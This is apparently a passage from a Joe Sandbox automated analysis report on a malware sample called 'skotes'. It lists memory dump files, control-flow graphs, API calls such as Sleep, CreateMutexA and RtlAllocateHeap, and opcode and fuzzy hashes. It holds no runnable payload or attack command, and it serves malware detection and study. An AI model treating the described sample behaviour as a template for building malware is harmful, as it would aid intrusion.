                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192598157.0000000001206000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192617604.0000000001208000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192638201.000000000120F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192667260.0000000001214000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192685890.0000000001215000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192704268.0000000001218000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192724830.0000000001221000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192743382.0000000001223000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192743382.000000000125D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192804813.0000000001277000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192824766.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192846058.000000000128C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192864359.000000000128D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192882548.000000000128E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192900314.0000000001293000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192917383.0000000001295000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192936942.00000000012A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192957004.00000000012A5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_f90000_skotes.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                            • Opcode ID: bb3e4d95d05fddd6034ffb665b987f1a9a7322141c5648961cea45b4f0641b4b
                                                                                                                                                                                                                                                                            • Instruction ID: bb2a2aae92b69d8b4f0214ad163612924922002d103c6bd0a889a0b4adbc0846
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bb3e4d95d05fddd6034ffb665b987f1a9a7322141c5648961cea45b4f0641b4b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C4214931B082449BFF189F6CEC89B2CB765EFC5310F20422DE418D76D5D7B99981A752
                                                                                                                                                                                                                                                                            Function 00F9A856 Relevance: 3.1, APIs: 2, Instructions: 100sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 315 f9a856-f9a86e 316 f9a89c-f9a89e 315->316 317 f9a870-f9a87c 315->317 318 f9a8a9-f9a8b1 call f97d30 316->318 319 f9a8a0-f9a8a7 316->319 320 f9a87e-f9a88c 317->320 321 f9a892-f9a899 call fad663 317->321 331 f9a8b3-f9a8bb call f97d30 318->331 332 f9a8e4-f9a8e6 318->332 322 f9a8eb-f9a916 call fa80c0 319->322 320->321 324 f9a94e 320->324 321->316 328 f9a953-f9a987 Sleep CreateMutexA 324->328 329 f9a94e call fc6c6a 324->329 334 f9a98e-f9a994 328->334 329->328 331->332 340 f9a8bd-f9a8c5 call f97d30 331->340 332->322 336 f9a9a7-f9a9a8 334->336 337 f9a996-f9a998 334->337 337->336 339 f9a99a-f9a9a5 337->339 339->336 340->332 344 f9a8c7-f9a8cf call f97d30 340->344 344->332 347 f9a8d1-f9a8d9 call f97d30 344->347 347->332 350 f9a8db-f9a8e2 347->350 350->322
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • Sleep.KERNELBASE(00000064), ref: 00F9A963
                                                                                                                                                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00FF3254), ref: 00F9A981
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2191722151.0000000000F91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191522995.0000000000F90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191722151.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191858509.0000000000FF9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191881227.0000000000FFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191927642.0000000001007000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192081416.000000000115C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192103935.000000000115E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192136126.0000000001176000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192136126.0000000001182000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192181803.000000000118D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192203030.000000000118E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192228643.000000000119E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192249856.000000000119F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192272763.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192291696.00000000011B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192309743.00000000011B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192329284.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192353043.00000000011BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192372056.00000000011C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192391121.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192410751.00000000011C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192434994.00000000011DE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192454832.00000000011E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192474813.00000000011E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192493129.00000000011EA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192512167.00000000011EB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192531136.00000000011F0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192558914.00000000011F7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192577269.00000000011F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192598157.0000000001206000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192617604.0000000001208000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192638201.000000000120F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192667260.0000000001214000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192685890.0000000001215000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192704268.0000000001218000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192724830.0000000001221000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192743382.0000000001223000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192743382.000000000125D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192804813.0000000001277000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192824766.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192846058.000000000128C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192864359.000000000128D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192882548.000000000128E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192900314.0000000001293000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192917383.0000000001295000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192936942.00000000012A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192957004.00000000012A5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_f90000_skotes.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                            • Opcode ID: c43feac81d3a19bc8414f0baba0e78147f133b986ada1549a3fe14a3c566764c
                                                                                                                                                                                                                                                                            • Instruction ID: 6f7dcc39a177ec492459b089309f682559d225fa4f38e8950ce181061c284d73
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c43feac81d3a19bc8414f0baba0e78147f133b986ada1549a3fe14a3c566764c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56213A71B593019BFF29BB689C9E73DB2529F81310F344816E508D62D2DB7A8981B2D3
                                                                                                                                                                                                                                                                            Function 00F9A34F Relevance: 3.1, APIs: 2, Instructions: 100sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 292 f9a34f-f9a35b 293 f9a35d-f9a36b 292->293 294 f9a371-f9a39a call fad663 292->294 293->294 296 f9a93a 293->296 300 f9a3c8-f9a916 call fa80c0 294->300 301 f9a39c-f9a3a8 294->301 298 f9a953-f9a994 Sleep CreateMutexA 296->298 299 f9a93a call fc6c6a 296->299 306 f9a9a7-f9a9a8 298->306 307 f9a996-f9a998 298->307 299->298 302 f9a3aa-f9a3b8 301->302 303 f9a3be-f9a3c5 call fad663 301->303 302->296 302->303 303->300 307->306 310 f9a99a-f9a9a5 307->310 310->306
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • Sleep.KERNELBASE(00000064), ref: 00F9A963
                                                                                                                                                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00FF3254), ref: 00F9A981
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2191722151.0000000000F91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191522995.0000000000F90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191722151.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191858509.0000000000FF9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191881227.0000000000FFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191927642.0000000001007000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192081416.000000000115C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192103935.000000000115E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192136126.0000000001176000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192136126.0000000001182000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192181803.000000000118D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192203030.000000000118E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192228643.000000000119E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192249856.000000000119F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192272763.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192291696.00000000011B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192309743.00000000011B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192329284.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192353043.00000000011BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192372056.00000000011C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192391121.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192410751.00000000011C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192434994.00000000011DE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192454832.00000000011E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192474813.00000000011E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192493129.00000000011EA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192512167.00000000011EB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192531136.00000000011F0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192558914.00000000011F7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192577269.00000000011F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192598157.0000000001206000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192617604.0000000001208000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192638201.000000000120F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192667260.0000000001214000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192685890.0000000001215000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192704268.0000000001218000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192724830.0000000001221000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192743382.0000000001223000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192743382.000000000125D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192804813.0000000001277000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192824766.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192846058.000000000128C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192864359.000000000128D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192882548.000000000128E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192900314.0000000001293000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192917383.0000000001295000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192936942.00000000012A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192957004.00000000012A5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_f90000_skotes.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                            • Opcode ID: 859f95a3d972f2dfc2b6c05aed88b1d29ff866482e4efc6e9d6268e11d418353
                                                                                                                                                                                                                                                                            • Instruction ID: a626c060355fb472b35fd8e4f6fa8d78c0923c129fc7354145be9fac607a28ca
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 859f95a3d972f2dfc2b6c05aed88b1d29ff866482e4efc6e9d6268e11d418353
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 63216732B042049BFF18DB68EC89B2CB762EF85320F204229E404976D5CB769580A792
                                                                                                                                                                                                                                                                            Function 00FCD82F Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 351 fcd82f-fcd83a 352 fcd83c-fcd846 351->352 353 fcd848-fcd84e 351->353 352->353 354 fcd87c-fcd887 call fc75f6 352->354 355 fcd867-fcd878 RtlAllocateHeap 353->355 356 fcd850-fcd851 353->356 361 fcd889-fcd88b 354->361 357 fcd87a 355->357 358 fcd853-fcd85a call fc9dc0 355->358 356->355 357->361 358->354 364 fcd85c-fcd865 call fc8e36 358->364 364->354 364->355
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00FCA813,00000001,00000364,00000006,000000FF,?,00FCEE3F,?,00000004,00000000,?,?), ref: 00FCD871
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2191722151.0000000000F91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191522995.0000000000F90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191722151.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191858509.0000000000FF9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191881227.0000000000FFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191927642.0000000001007000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192081416.000000000115C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192103935.000000000115E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192136126.0000000001176000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192136126.0000000001182000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192181803.000000000118D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192203030.000000000118E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192228643.000000000119E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192249856.000000000119F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192272763.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192291696.00000000011B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192309743.00000000011B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192329284.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192353043.00000000011BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192372056.00000000011C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192391121.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192410751.00000000011C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192434994.00000000011DE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192454832.00000000011E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192474813.00000000011E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192493129.00000000011EA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192512167.00000000011EB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192531136.00000000011F0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192558914.00000000011F7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192577269.00000000011F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192598157.0000000001206000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192617604.0000000001208000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192638201.000000000120F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192667260.0000000001214000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192685890.0000000001215000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192704268.0000000001218000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192724830.0000000001221000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192743382.0000000001223000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192743382.000000000125D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192804813.0000000001277000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192824766.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192846058.000000000128C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192864359.000000000128D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192882548.000000000128E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192900314.0000000001293000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192917383.0000000001295000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192936942.00000000012A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192957004.00000000012A5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_f90000_skotes.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                            • Opcode ID: f173e43fa50d97f3562659e8bd58af8c8c5b65d5017bf9c1bd87194a4fcc4126
                                                                                                                                                                                                                                                                            • Instruction ID: ec16ea707137d430d4997733ba1ed14e05b9d1aa27beacf575d28432efc6187a
